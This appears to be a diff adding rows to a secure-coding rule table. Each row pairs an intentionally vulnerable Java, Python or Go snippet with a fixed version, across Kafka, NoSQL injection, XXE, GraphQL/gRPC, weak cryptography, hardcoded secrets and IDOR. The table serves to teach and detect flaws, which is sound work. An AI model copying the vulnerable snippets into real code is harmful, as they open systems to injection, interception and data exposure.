+| KFK-004 | Kafka keystore not configured for mutual TLS | `props.put("security.protocol", "SSL");` | `props.put("ssl.keystore.location", "/etc/ssl/kafka.keystore.jks");`<br>`props.put("ssl.keystore.password", secret("KAFKA_KEYSTORE_PASSWORD"));` | Kafka - mTLS | CWE-319 |
+| KFK-005 | Kafka SASL_SSL missing JAAS configuration | `props.put("security.protocol", "SASL_SSL");` | `props.put("sasl.jaas.config", secret("KAFKA_SASL_JAAS"));`<br>`props.put("sasl.mechanism", "SCRAM-SHA-512");` | Kafka - Authentication | CWE-306 |
+| KFK-006 | Kafka SASL mechanism uses weak/legacy auth | `props.put("sasl.mechanism", "PLAIN");` | `props.put("sasl.mechanism", "SCRAM-SHA-512");` | Kafka - Authentication | CWE-287 |
+| KFK-007 | Consumer group with broad ACL principal | `props.put("sasl.jaas.config", "username=admin password=...");` | `props.put("sasl.jaas.config", leastPrivilegedPrincipal("orders-consumer"));` | Kafka - Authorization | CWE-250 |
+| KFK-008 | Producer retries without idempotence enabled | `props.put("acks", "all");` | `props.put("acks", "all");`<br>`props.put("enable.idempotence", "true");` | Kafka - Integrity | CWE-345 |
+| KFK-009 | Kafka message headers trusted without validation | `String tenant = headers.lastHeader("tenant").value().toString();` | `String tenant = validatedTenantHeader(headers.lastHeader("tenant"));` | Kafka - Input Validation | CWE-20 |
+| KFK-010 | Untrusted JSON to `Object` deserialization in consumer (Logic: strong) | `Object evt = mapper.readValue(record.value(), Object.class);` | `EventEnvelope env = mapper.readValue(record.value(), EventEnvelope.class);`<br>`DomainEvent evt = allowlistedEventType(env);` | Kafka - Deserialization | CWE-502 |
+| KFK-011 | Jackson default typing enabled in Kafka consumer (Logic: strong) | `mapper.activateDefaultTyping(...);`<br>`mapper.readValue(record.value(), Object.class);` | `mapper.deactivateDefaultTyping();`<br>`mapper.readValue(record.value(), TrustedEvent.class);` | Kafka - Deserialization | CWE-502 |
+| KFK-012 | Consumer processes Java-serialized payload bytes (Logic: strong) | `new ObjectInputStream(new ByteArrayInputStream(record.value())).readObject();` | `mapper.readValue(record.value(), TrustedEvent.class);`<br>`// ban Java native serialization` | Kafka - Deserialization | CWE-502 |
+| KFK-013 | Avro/Schema registry compatibility not enforced | `consumer.poll(Duration.ofSeconds(1));` | `schemaPolicy.requireBackwardCompatible("orders-topic");` | Kafka - Schema Governance | CWE-20 |
+| KFK-014 | Consumer auto-commit before business validation | `props.put("enable.auto.commit", "true");` | `props.put("enable.auto.commit", "false");`<br>`commitAfterValidation(consumer);` | Kafka - Processing Integrity | CWE-345 |
+| KFK-015 | DLQ strategy missing for deserialization failures (Logic: strong) | `catch (Exception e) { log.error("bad msg", e); }` | `catch (Exception e) { dlqProducer.send(record, reason(e)); }` | Kafka - Deserialization Reliability | CWE-502 |
+| KFK-016 | Kafka topic names built from untrusted input | `String topic = "orders-" + req.getTenant(); producer.send(new ProducerRecord<>(topic, payload));` | `String topic = allowlistedTopic(req.getTenant()); producer.send(new ProducerRecord<>(topic, payload));` | Kafka - Topic Isolation | CWE-20 |
+| KFK-017 | Kafka client allows insecure protocol downgrade from env | `props.put("security.protocol", System.getenv("KAFKA_PROTOCOL"));` | `props.put("security.protocol", "SSL");`<br>`rejectIfNot("SSL", System.getenv("KAFKA_PROTOCOL"));` | Kafka - Config Integrity | CWE-319 |
+| KFK-018 | Kafka consumer trusts source service header for authz | `if ("payments".equals(header("x-service"))) process(record);` | `if (!mtlsIdentityMatches(record.headers())) throw new SecurityException();` | Kafka - Trust Boundary | CWE-290 |
+| KFK-019 | Producer compression with insecure external codec plugin | `props.put("compression.type", req.getCompression());` | `props.put("compression.type", "lz4");`<br>`// allowlisted built-in codecs only` | Kafka - Supply Chain | CWE-1104 |
+| KFK-020 | Missing `max.partition.fetch.bytes` limits on consumer | `consumer.poll(Duration.ofSeconds(1));` | `props.put("max.partition.fetch.bytes", "1048576");`<br>`props.put("fetch.max.bytes", "5242880");` | Kafka - Resource Control | CWE-400 |
+| NOS-001 | Redis Lua script built with `String.format` and untrusted args | `String script = String.format("return redis.call('SET', '%s', '%s')", key, value);` | `String script = "return redis.call('SET', KEYS[1], ARGV[1])";`<br>`jedis.eval(script, List.of(key), List.of(value));` | Redis - Script Injection | CWE-94 |
+| NOS-002 | Redis EVAL with concatenated user-controlled Lua body | `jedis.eval("return " + req.getScript());` | `jedis.eval(ALLOWLISTED_SCRIPT_ID, keys, args);` | Redis - Script Injection | CWE-94 |
+| NOS-003 | Redis key pattern from user input without allowlist | `jedis.keys(req.getPattern())` | `jedis.scan(allowlistedPattern(req.getPattern()))` | Redis - Access Control | CWE-20 |
+| NOS-004 | Redis command built dynamically from untrusted action | `jedis.sendCommand(Protocol.Command.valueOf(req.getCmd()), req.getArg());` | `executeAllowlistedRedisCommand(req.getCmd(), req.getArg());` | Redis - Command Injection | CWE-78 |
+| NOS-005 | Mongo `$where` query uses raw user input | `query.put("$where", req.getExpr());` | `query.put("ownerId", req.getOwnerId());`<br>`query.put("status", allowlistedStatus(req.getStatus()));` | MongoDB - Expression Injection | CWE-943 |
+| NOS-006 | Mongo query JSON parsed directly from request | `Document filter = Document.parse(req.getFilterJson());` | `Document filter = buildAllowlistedFilter(req);` | MongoDB - Query Injection | CWE-89 |
+| NOS-007 | Spring Data `@Query` with SpEL string concatenation | `@Query("{ '$where': ?0 }")` | `@Query("{ 'tenantId': ?0, 'status': ?1 }")` | MongoDB - Query Safety | CWE-943 |
+| NOS-008 | Mongo regex query from unbounded user input | `query.put("name", Pattern.compile(req.getRegex()));` | `query.put("name", Pattern.compile(allowlistedRegex(req.getRegex())));` | MongoDB - ReDoS | CWE-400 |
+| NOS-009 | Mongo update operators from user payload | `collection.updateOne(filter, Document.parse(req.getUpdate()));` | `collection.updateOne(filter, buildAllowlistedUpdate(req));` | MongoDB - Update Injection | CWE-20 |
+| NOS-010 | Mongo projection exposes sensitive fields by default | `collection.find(filter).first();` | `collection.find(filter).projection(Projections.exclude("secret","token","hash"));` | MongoDB - Data Exposure | CWE-200 |
+| NOS-011 | Redis connection without ACL username/token isolation | `new Jedis(host, port);` | `new JedisPooled(host, port, redisUser(), redisPassword());` | Redis - Authentication | CWE-306 |
+| NOS-012 | Redis TLS disabled in production client | `redis://cache.internal:6379` | `rediss://cache.internal:6380`<br>`// enforce TLS and cert validation` | Redis - Transport Security | CWE-319 |
+| NOS-013 | Mongo connection string allows insecure TLS config | `mongodb://db.internal:27017/app` | `mongodb+srv://db.example.com/app?tls=true&tlsAllowInvalidCertificates=false` | MongoDB - Transport Security | CWE-319 |
+| NOS-014 | Redis Lua script cache key from user data collision risk | `String sha = jedis.scriptLoad(req.getScript());` | `String sha = loadAllowlistedScript(req.getScriptId());` | Redis - Script Integrity | CWE-345 |
+| NOS-015 | Mongo aggregation pipeline stage list from user JSON | `List<Document> p = parsePipeline(req.getPipeline()); collection.aggregate(p);` | `List<Document> p = buildAllowlistedPipeline(req); collection.aggregate(p);` | MongoDB - Aggregation Injection | CWE-20 |
+| NOS-016 | Redis pub/sub channel name from untrusted source | `jedis.publish(req.getChannel(), payload);` | `jedis.publish(allowlistedChannel(req.getChannel()), payload);` | Redis - Messaging Security | CWE-20 |
+| NOS-017 | Mongo map-reduce JavaScript from request payload | `collection.mapReduce(req.getMap(), req.getReduce());` | `collection.aggregate(allowlistedAggregation(req));` | MongoDB - Code Injection | CWE-94 |
+| NOS-018 | Redis Lua KEYS/ARGV length unchecked causing abuse | `jedis.eval(script, keys, args);` | `requireMaxLuaArgs(keys, args, 16); jedis.eval(script, keys, args);` | Redis - Resource Control | CWE-400 |
+| NOS-019 | Mongo `allowDiskUse(true)` with unbounded user filter | `collection.aggregate(pipeline).allowDiskUse(true);` | `collection.aggregate(allowlistedPipeline(req)).allowDiskUse(false);` | MongoDB - Resource Control | CWE-400 |
+| NOS-020 | Redis/Mongo clients log raw query/script with secrets | `log.info("query={}", req.getFilterJson());` | `log.info("query_keys={}", safeQueryKeys(req));` | NoSQL - Logging Hygiene | CWE-532 |
+| XML-001 | XML parser missing `FEATURE_SECURE_PROCESSING` | `factory.newDocumentBuilder().parse(input);` | `factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);`<br>`factory.newDocumentBuilder().parse(input);` | XML - Parser Hardening | CWE-611 |
+| XML-002 | XML parser allows external general entities | `factory.setFeature("http://xml.org/sax/features/external-general-entities", true);` | `factory.setFeature("http://xml.org/sax/features/external-general-entities", false);` | XML - XXE Prevention | CWE-611 |
+| XML-003 | XML parser allows external parameter entities | `factory.setFeature("http://xml.org/sax/features/external-parameter-entities", true);` | `factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);` | XML - XXE Prevention | CWE-611 |
+| XML-004 | XML parser does not disallow DOCTYPE declarations | `factory.newDocumentBuilder().parse(input);` | `factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);`<br>`factory.newDocumentBuilder().parse(input);` | XML - XXE Prevention | CWE-611 |
+| XML-005 | StAX parser supports DTD by default | `XMLInputFactory xif = XMLInputFactory.newFactory();` | `xif.setProperty(XMLInputFactory.SUPPORT_DTD, false);` | XML - XXE Prevention | CWE-611 |
+| XML-006 | StAX parser supports external entities by default | `xif.createXMLStreamReader(input);` | `xif.setProperty("javax.xml.stream.isSupportingExternalEntities", false);`<br>`xif.createXMLStreamReader(input);` | XML - XXE Prevention | CWE-611 |
+| XML-007 | JAXB unmarshalling from unsafe source without secure SAX | `unmarshaller.unmarshal(inputStream);` | `Source safe = secureSaxSource(inputStream);`<br>`unmarshaller.unmarshal(safe);` | XML - Safe Unmarshal | CWE-611 |
+| XML-008 | XML entity expansion limits not configured (billion laughs risk) | `builder.parse(input);` | `factory.setAttribute("http://www.oracle.com/xml/jaxp/properties/entityExpansionLimit", "1024");`<br>`builder.parse(input);` | XML - DoS Prevention | CWE-611 |
+| XML-009 | TransformerFactory allows external DTD/stylesheets | `TransformerFactory tf = TransformerFactory.newInstance();` | `tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");`<br>`tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");` | XML - XSLT Hardening | CWE-611 |
+| XML-010 | XML parse exceptions returned verbosely to clients | `return ResponseEntity.badRequest().body(ex.getMessage());` | `log.warn("xml parse error", ex);`<br>`return ResponseEntity.badRequest().body("invalid xml payload");` | XML - Error Handling | CWE-209 |
+| SPR-104 | GraphQL Circular Fragment Detection Missing | `graphQlService.execute(queryString);` | `GraphQLDocument doc = parser.parseDocument(queryString);`<br>`if (graphQlGuard.hasCircularFragments(doc)) throw new AccessDeniedException("circular fragments");`<br>`graphQlService.execute(queryString);` | Spring GraphQL 1.3 - Query Validation | CWE-674 |
+| SPR-105 | GraphQL Query Depth Limit Not Enforced | `return graphQlService.execute(req.query());` | `int depth = graphQlGuard.computeDepth(req.query());`<br>`if (depth > 8) throw new ResponseStatusException(HttpStatus.BAD_REQUEST, "depth exceeded");`<br>`return graphQlService.execute(req.query());` | Spring GraphQL 1.3 - DoS Protection | CWE-400 |
+| SPR-106 | GraphQL Query Complexity Budget Missing | `graphQlService.execute(req.query());` | `int complexity = graphQlGuard.complexity(req.query());`<br>`if (complexity > 500) throw new ResponseStatusException(HttpStatus.BAD_REQUEST, "complexity exceeded");` | Spring GraphQL 1.3 - DoS Protection | CWE-400 |
+| SPR-107 | GraphQL Field-level AuthZ Bypass in Nested Resolver | `@SchemaMapping(typeName="Account", field="transactions")`<br>`List<Tx> tx(Account a){ return txRepo.findAllByAccountId(a.id()); }` | `@SchemaMapping(typeName="Account", field="transactions")`<br>`List<Tx> tx(Account a){`<br>`  authz.require("account:tx:read", a.id());`<br>`  return txRepo.findAllOwned(a.id(), tenantFromAuth());`<br>`}` | Spring GraphQL 1.3 - Authorization | CWE-285 |
+| SPR-108 | GraphQL Introspection Enabled for Public Traffic | `GraphQlSource.builder().configureRuntimeWiring(w -> {}).build();` | `GraphQlSource.builder().configureGraphQl(g -> g.instrumentation(introspectionPolicy.instrumentation())).build();`<br>`// deny introspection for non-admin principals in prod` | Spring GraphQL 1.3 - Exposure Control | CWE-200 |
+| SPR-109 | GraphQL Alias Amplification Not Capped | `graphQlService.execute(req.query());` | `if (graphQlGuard.aliasCount(req.query()) > 30) throw new AccessDeniedException("too many aliases");` | Spring GraphQL 1.3 - Abuse Prevention | CWE-770 |
+| SPR-110 | GraphQL DataLoader Cache Shared Across Tenants | `DataLoaderRegistry registry = sharedRegistry;` | `DataLoaderRegistry registry = tenantScopedRegistry(tenantFromAuth());` | Spring GraphQL 1.3 - Tenant Isolation | CWE-639 |
+| SPR-111 | GraphQL Subscription Lacks Auth Re-check on Event Push | `publisher.publish(event);` | `if (!authz.canReceive(currentPrincipal(), event.resourceId())) return;`<br>`publisher.publish(event);` | Spring GraphQL 1.3 - Subscription AuthZ | CWE-287 |
+| SPR-112 | GraphQL Persisted Query Hash Not Verified | `persistedQueryStore.resolve(hash).orElse(queryFromClient);` | `String q = persistedQueryStore.require(hash);`<br>`if (!sha256(q).equals(hash)) throw new SecurityException("hash mismatch");` | Spring GraphQL 1.3 - Integrity | CWE-353 |
+| SPR-113 | GraphQL N+1 Resolver Chain Causes Compute Exhaustion | `orders.stream().map(o -> paymentRepo.findByOrderId(o.id())).toList();` | `DataLoader<UUID,List<Payment>> l = registry.getDataLoader("paymentsByOrder");`<br>`return orders.stream().map(o -> l.load(o.id())).toList();` | Spring GraphQL 1.3 - Performance Security | CWE-400 |
+| SPR-114 | gRPC Metadata Reflection Endpoint Without Auth | `service.reflectMetadata(req);` | `authz.requireScope(authentication, "grpc:metadata:read");`<br>`service.reflectMetadata(req);` | Java gRPC - Admin Surface | CWE-306 |
+| SPR-115 | gRPC Stream Deadlock via Blocking Bidirectional Flow | `while(true){ streamObserver.onNext(queue.take()); }` | `while (!ctx.isCancelled()) {`<br>`  Message m = queue.poll(100, TimeUnit.MILLISECONDS);`<br>`  if (m != null) streamObserver.onNext(m);`<br>`}` | Java gRPC - Streaming Safety | CWE-833 |
+| SPR-116 | gRPC Protobuf Deserialization Limit Missing | `Server server = ServerBuilder.forPort(8443).addService(svc).build();` | `Server server = NettyServerBuilder.forPort(8443)`<br>`.maxInboundMessageSize(2 * 1024 * 1024)`<br>`.addService(svc).build();` | Java gRPC - Deserialization Limits | CWE-770 |
+| SPR-117 | gRPC Accepts Caller Identity from Untrusted Metadata | `String uid = headers.get(Metadata.Key.of("x-user-id", ASCII_STRING_MARSHALLER));` | `Principal p = mTlsPrincipalExtractor.extract(context);`<br>`if (p == null) throw Status.UNAUTHENTICATED.asRuntimeException();` | Java gRPC - Identity | CWE-290 |
+| SPR-118 | gRPC Interceptor Order Allows AuthZ Before AuthN | `ServerInterceptors.intercept(service, authzInterceptor, authnInterceptor);` | `ServerInterceptors.intercept(service, authnInterceptor, authzInterceptor, auditInterceptor);` | Java gRPC - Interceptor Security | CWE-306 |
+| SPR-119 | gRPC Deadline Not Propagated to Downstream Calls | `downstreamStub.call(req);` | `Context.CancellableContext c = Context.current().withDeadlineAfter(2, TimeUnit.SECONDS, scheduler);`<br>`try { c.run(() -> downstreamStub.withDeadlineAfter(2, TimeUnit.SECONDS).call(req)); } finally { c.cancel(null); }` | Java gRPC - Resource Governance | CWE-400 |
+| SPR-120 | Protobuf `Any` Type URL Not Allowlisted | `Any any = req.getPayload(); DomainEvent e = any.unpack(DomainEvent.class);` | `Any any = req.getPayload();`<br>`if (!allowedTypeUrls.contains(any.getTypeUrl())) throw Status.INVALID_ARGUMENT.asRuntimeException();` | Java gRPC - Deserialization Safety | CWE-502 |
+| SPR-121 | gRPC Server Reflection Exposed on Public Port | `ProtoReflectionService.newInstance();` | `if (env.isAdminListener()) serverBuilder.addService(ProtoReflectionService.newInstance());` | Java gRPC - Exposure Control | CWE-200 |
+| SPR-122 | gRPC Retry Storm from Unbounded Client Retries | `ManagedChannel ch = ManagedChannelBuilder.forTarget(t).useTransportSecurity().build();` | `ManagedChannel ch = NettyChannelBuilder.forTarget(t)`<br>`.defaultServiceConfig(retryPolicy.maxAttempts(3, Duration.ofMillis(200)))`<br>`.enableRetry().build();` | Java gRPC - Resilience | CWE-770 |
+| SPR-123 | gRPC Concurrent Ledger Mutation Race (Logic: strong) | `if (balance >= amount) { balance -= amount; ledger.save(); }` | `ledgerTxTemplate.execute(status -> {`<br>`  LedgerRow r = ledgerRepo.lockForUpdate(accountId);`<br>`  if (r.balance().compareTo(amount) < 0) throw new AccessDeniedException("insufficient");`<br>`  ledgerRepo.applyTransfer(accountId, targetId, amount);`<br>`  return null;`<br>`});` | Java gRPC Finance - Concurrency (Logic: strong) | CWE-362 |
+| CRY-001 | Weak hash algorithm MD5 used for password hashing | `MessageDigest md = MessageDigest.getInstance("MD5");` | `String hash = BCrypt.hashpw(password, BCrypt.gensalt(12));` | Java/Python/Go Cryptography | CWE-327 |
+| CRY-002 | Weak hash algorithm SHA-1 used in security context | `MessageDigest.getInstance("SHA-1");` | `MessageDigest.getInstance("SHA-256");`<br>`// for passwords use Argon2/BCrypt` | Java/Python/Go Cryptography | CWE-327 |
+| CRY-003 | DES cipher usage in encryption flow | `Cipher.getInstance("DES/ECB/PKCS5Padding");` | `Cipher.getInstance("AES/GCM/NoPadding");` | Java/Python/Go Cryptography | CWE-327 |
+| CRY-004 | Blowfish cipher usage for sensitive data | `Cipher.getInstance("Blowfish");` | `Cipher.getInstance("AES/GCM/NoPadding");` | Java/Python/Go Cryptography | CWE-327 |
+| CRY-005 | RSA key size below 2048 bits | `keyGen.initialize(1024);` | `keyGen.initialize(3072);` | Java/Python/Go Cryptography | CWE-327 |
+| CRY-006 | Hardcoded IV in symmetric encryption | `byte[] iv = "0000000000000000".getBytes();` | `byte[] iv = SecureRandom.getInstanceStrong().generateSeed(12);` | Java/Python/Go Cryptography | CWE-329 |
+| CRY-007 | AES ECB mode used for structured plaintext | `Cipher.getInstance("AES/ECB/PKCS5Padding");` | `Cipher.getInstance("AES/GCM/NoPadding");` | Java/Python/Go Cryptography | CWE-327 |
+| CRY-008 | Missing authentication tag verification in decrypt flow | `cipher.doFinal(ciphertext);` | `cipher.doFinal(ciphertextWithTag);`<br>`// fail closed on AEADBadTagException` | Java/Python/Go Cryptography | CWE-347 |
+| CRY-009 | Weak PBKDF2 iteration count | `new PBEKeySpec(pass, salt, 10000, 256);` | `new PBEKeySpec(pass, salt, 310000, 256);` | Java/Python/Go Cryptography | CWE-916 |
+| CRY-010 | Reused salt across users for password hashing | `byte[] salt = GLOBAL_SALT;` | `byte[] salt = SecureRandom.getInstanceStrong().generateSeed(16);` | Java/Python/Go Cryptography | CWE-330 |
+| CRY-011 | java.util.Random used for token generation | `String t = Long.toHexString(new Random().nextLong());` | `SecureRandom sr = SecureRandom.getInstanceStrong();`<br>`String t = tokenFrom(sr);` | Java/Python/Go Randomness | CWE-330 |
+| CRY-012 | Math.random() used for session identifiers | `String sid = String.valueOf(Math.random());` | `String sid = UUID.randomUUID().toString();` | Java/Python/Go Randomness | CWE-330 |
+| CRY-013 | Go `math/rand` used for secret material | `b[i] = byte(rand.Intn(256));` | `cryptoRand.Read(b);` | Java/Python/Go Randomness | CWE-330 |
+| CRY-014 | Python `random` module used for auth token | `token = ''.join(random.choice(alpha) for _ in range(32))` | `token = secrets.token_urlsafe(32)` | Java/Python/Go Randomness | CWE-330 |
+| CRY-015 | Deterministic seed from timestamp in security context | `Random r = new Random(System.currentTimeMillis());` | `SecureRandom r = SecureRandom.getInstanceStrong();` | Java/Python/Go Randomness | CWE-330 |
+| CRY-016 | Predictable OTP generation without cryptographic RNG | `otp = random.nextInt(1000000);` | `otp = secureOtp(SecureRandom.getInstanceStrong());` | Java/Python/Go Randomness | CWE-330 |
+| CRY-017 | UUID v1/time-based identifiers used as auth secrets | `UUID uuid = UUID.fromString(timeBased);` | `UUID uuid = UUID.randomUUID();`<br>`// for secrets prefer opaque cryptographic tokens` | Java/Python/Go Randomness | CWE-330 |
+| CRY-018 | Custom PRNG for key generation | `byte[] key = customPrng.nextBytes(32);` | `byte[] key = SecureRandom.getInstanceStrong().generateSeed(32);` | Java/Python/Go Randomness | CWE-338 |
+| CRY-019 | Nonce counter resets across process restarts | `nonce = loadCounter();` | `nonce = randomNonce();`<br>`persistMonotonicCounterSafely(nonceCounter);` | Java/Python/Go Randomness | CWE-330 |
+| CRY-020 | Shared RNG instance across tenant-boundary key operations | `static Random RNG = new Random();` | `ThreadLocal<SecureRandom> RNG = ThreadLocal.withInitial(() -> SecureRandom.getInstanceStrong());` | Java/Python/Go Randomness | CWE-362 |
+| CRY-021 | Secret Leak (Logic: strong): hardcoded API key in source code | `String apiKey = "sk_live_123";` | `String apiKey = System.getenv("API_KEY");` | Java/Python/Go Secret Management | CWE-798 |
+| CRY-022 | Secret Leak (Logic: strong): hardcoded DB password in config | `spring.datasource.password=supersecret` | `spring.datasource.password=${DB_PASSWORD}` | Java/Python/Go Secret Management | CWE-798 |
+| CRY-023 | Secret Leak (Logic: strong): PEM private key embedded inline | `-----BEGIN PRIVATE KEY-----` | `loadPrivateKeyFromKMS();`<br>`// never embed private keys in repo` | Java/Python/Go Secret Management | CWE-798 |
+| CRY-024 | Secret Leak (Logic: strong): AWS secret access key in code | `aws_secret_access_key: AKIA...` | `aws_secret_access_key: ${AWS_SECRET_ACCESS_KEY}` | Java/Python/Go Secret Management | CWE-798 |
+| CRY-025 | Secret Leak (Logic: strong): JWT signing key hardcoded | `jwt.sign(payload, "my-hardcoded-secret")` | `jwt.sign(payload, getSecret("JWT_SIGNING_KEY"))` | Java/Python/Go Secret Management | CWE-798 |
+| CRY-026 | Secret Leak (Logic: strong): Redis password literal in URI | `redis://:password@host:6379` | `redis://:${REDIS_PASSWORD}@host:6379` | Java/Python/Go Secret Management | CWE-798 |
+| CRY-027 | Secret Leak (Logic: strong): Mongo URI contains plaintext credentials | `mongodb://user:pass@db:27017/app` | `mongodb://user:${MONGO_PASSWORD}@db:27017/app` | Java/Python/Go Secret Management | CWE-798 |
+| CRY-028 | Secret Leak (Logic: strong): OAuth client secret in frontend bundle | `const clientSecret = "secret";` | `// remove secret from client; use backend token exchange` | Java/Python/Go Secret Management | CWE-798 |
+| CRY-029 | Secret Leak (Logic: strong): service account JSON key committed in repo | `"private_key": "-----BEGIN PRIVATE KEY-----"` | `loadServiceAccountFromSecretManager();` | Java/Python/Go Secret Management | CWE-798 |
+| CRY-030 | Secret Leak (Logic: strong): encryption key stored as static constant | `static final String ENC_KEY="...";` | `static final Supplier<byte[]> ENC_KEY = () -> kms.fetchKey("enc-key");` | Java/Python/Go Secret Management | CWE-798 |
+| CRY-031 | TLS TrustAllStrategy disables certificate chain validation | `SSLContextBuilder.create().loadTrustMaterial(new TrustAllStrategy())` | `SSLContextBuilder.create().loadTrustMaterial(trustStore, null)` | Java/Python/Go TLS Validation | CWE-295 |
+| CRY-032 | NoopHostnameVerifier disables hostname verification | `HttpClients.custom().setSSLHostnameVerifier(NoopHostnameVerifier.INSTANCE)` | `HttpClients.custom().setSSLHostnameVerifier(DefaultHostnameVerifier.INSTANCE)` | Java/Python/Go TLS Validation | CWE-295 |
+| CRY-033 | Go TLS client with `InsecureSkipVerify=true` | `&tls.Config{InsecureSkipVerify: true}` | `&tls.Config{InsecureSkipVerify: false, MinVersion: tls.VersionTLS13}` | Java/Python/Go TLS Validation | CWE-295 |
+| CRY-034 | Python requests disables TLS verify flag | `requests.get(url, verify=False)` | `requests.get(url, verify="/etc/ssl/certs/ca-bundle.crt")` | Java/Python/Go TLS Validation | CWE-295 |
+| CRY-035 | Java HttpsURLConnection custom TrustManager accepts all certs | `checkServerTrusted(...) {}` | `useDefaultTrustManager(trustStore);` | Java/Python/Go TLS Validation | CWE-295 |
+| CRY-036 | TLS protocol allows legacy versions < 1.2 | `sslContext.init(...);`<br>`enabledProtocols={"TLSv1","TLSv1.1"}` | `enabledProtocols={"TLSv1.2","TLSv1.3"}` | Java/Python/Go TLS Validation | CWE-327 |
+| CRY-037 | Certificate pinning missing for high-risk outbound channel | `client = defaultHttpsClient();` | `client = pinnedCertHttpsClient(expectedSpkiSha256);` | Java/Python/Go TLS Validation | CWE-295 |
+| CRY-038 | Hostname verifier based on suffix/contains match | `return host.endsWith("example.com");` | `return strictHostnameMatch(host, cert);` | Java/Python/Go TLS Validation | CWE-295 |
+| CRY-039 | Custom CA bundle loaded from untrusted path | `verify="/tmp/ca.pem"` | `verify="/etc/ssl/certs/approved-ca.pem"` | Java/Python/Go TLS Validation | CWE-295 |
+| CRY-040 | gRPC channel uses plaintext for sensitive service | `ManagedChannelBuilder.forAddress(host, port).usePlaintext()` | `NettyChannelBuilder.forAddress(host, port).useTransportSecurity()` | Java/Python/Go TLS Validation | CWE-319 |
+| CRY-041 | Secret key material logged during initialization (Logic: strong) | `log.info("loaded key={}", keyBytes);` | `log.info("loaded key id={}", keyId);` | Java/Python/Go Secret Management | CWE-532 |
+| CRY-042 | Hardcoded basic-auth credentials in HTTP client (Logic: strong) | `new BasicCredentialsProvider("admin","admin123")` | `new BasicCredentialsProvider(userFromSecret(), passFromSecret())` | Java/Python/Go Secret Management | CWE-798 |
+| CRY-043 | Config file includes plaintext SMTP credentials (Logic: strong) | `mail.password=secret` | `mail.password=${SMTP_PASSWORD}` | Java/Python/Go Secret Management | CWE-798 |
+| CRY-044 | Docker/K8s env var exposes private key text (Logic: strong) | `ENV PRIVATE_KEY="-----BEGIN..."` | `ENV PRIVATE_KEY_FILE=/run/secrets/private_key` | Java/Python/Go Secret Management | CWE-798 |
+| CRY-045 | API token serialized into client-visible JSON response (Logic: strong) | `return Map.of("token", token, "user", user);` | `return Map.of("tokenRef", tokenRef, "user", userPublic);` | Java/Python/Go Secret Management | CWE-200 |
+| CRY-046 | Weak HMAC algorithm SHA1 for message signing | `Mac.getInstance("HmacSHA1");` | `Mac.getInstance("HmacSHA256");` | Java/Python/Go Cryptography | CWE-327 |
+| CRY-047 | Static salt and pepper constants in password KDF | `salt="salt"; pepper="pepper";` | `salt=randomSalt(); pepper=secretManager.get("pepper");` | Java/Python/Go Cryptography | CWE-916 |
+| CRY-048 | Key derivation uses direct hash instead of KDF | `key = sha256(password)` | `key = argon2id(password, salt, params)` | Java/Python/Go Cryptography | CWE-916 |
+| CRY-049 | RSA key generation from predictable seed | `SecureRandom sr = SecureRandom.getInstance("SHA1PRNG"); sr.setSeed(12345L);` | `SecureRandom sr = SecureRandom.getInstanceStrong();` | Java/Python/Go Randomness | CWE-330 |
+| CRY-050 | TLS client disables revocation checks globally | `System.setProperty("com.sun.net.ssl.checkRevocation","false");` | `System.setProperty("com.sun.net.ssl.checkRevocation","true");`<br>`enableOcspStapling();` | Java/Python/Go TLS Validation | CWE-295 |
+| BIZ-001 | BOLA/IDOR (Logic: strong): @PathVariable ID used without ownership check | `@GetMapping("/accounts/{id}")`<br>`AccountDto get(@PathVariable Long id){ return svc.getById(id); }` | `@GetMapping("/accounts/{id}")`<br>`@PreAuthorize("@authz.ownsAccount(authentication,#id)")`<br>`AccountDto get(@PathVariable Long id){ return svc.getOwnedById(id, authUserId()); }` | Java/Python/Go AuthZ Logic (Logic: strong) | CWE-639 |
+| BIZ-002 | BOLA/IDOR (Logic: strong): @RequestParam userId controls object lookup | `repo.findByUserId(userId)` | `repo.findByUserIdAndOwnerId(userId, authUserId())` | Java/Python/Go AuthZ Logic (Logic: strong) | CWE-639 |
+| BIZ-003 | BOLA/IDOR (Logic: strong): service layer accepts external resource id directly | `orderService.cancel(orderId)` | `orderService.cancelOwned(orderId, authUserId())` | Java/Python/Go AuthZ Logic (Logic: strong) | CWE-639 |
+| BIZ-004 | BOLA/IDOR (Logic: strong): repository `findById` without tenant/user boundary | `repo.findById(id)` | `repo.findByIdAndTenantId(id, tenantIdFromToken())` | Java/Python/Go AuthZ Logic (Logic: strong) | CWE-639 |
+| BIZ-005 | BOLA/IDOR (Logic: strong): update endpoint writes by arbitrary id | `svc.update(id, req)` | `svc.updateOwned(id, authUserId(), req)` | Java/Python/Go AuthZ Logic (Logic: strong) | CWE-639 |
+| BIZ-006 | BOLA/IDOR (Logic: strong): delete by id lacks object-level authorization | `repo.deleteById(id)` | `repo.deleteByIdAndOwnerId(id, authUserId())` | Java/Python/Go AuthZ Logic (Logic: strong) | CWE-639 |
+| BIZ-007 | BOLA/IDOR (Logic: strong): file download uses path/id from request only | `storage.read(fileId)` | `storage.readOwned(fileId, authUserId())` | Java/Python/Go AuthZ Logic (Logic: strong) | CWE-639 |
+| BIZ-008 | BOLA/IDOR (Logic: strong): GraphQL resolver returns entity by id without principal check | `return svc.byId(id);` | `return svc.byIdOwned(id, principal.getName());` | Java/Python/Go AuthZ Logic (Logic: strong) | CWE-639 |
+| BIZ-009 | BOLA/IDOR (Logic: strong): batch fetch includes foreign records | `repo.findAllById(ids)` | `repo.findAllByIdInAndOwnerId(ids, authUserId())` | Java/Python/Go AuthZ Logic (Logic: strong) | CWE-639 |
+| BIZ-010 | BOLA/IDOR (Logic: strong): admin-only route missing role guard | `@GetMapping("/admin/users")` | `@PreAuthorize("hasRole('ADMIN')")`<br>`@GetMapping("/admin/users")` | Java/Python/Go AuthZ Logic (Logic: strong) | CWE-285 |
+| BIZ-011 | Mass Assignment (Logic: strong): JPA Entity bound directly from @RequestBody | `public User save(@RequestBody User user)` | `public UserDto save(@Valid @RequestBody UserCreateDto dto)`<br>`User user = mapper.fromCreateDto(dto);` | Java/Python/Go Data Binding (Logic: strong) | CWE-915 |
+| BIZ-012 | Mass Assignment (Logic: strong): role field writable from public API | `user.setRole(req.getRole());` | `// ignore role from client`<br>`user.setRole(Role.USER);` | Java/Python/Go Data Binding (Logic: strong) | CWE-915 |
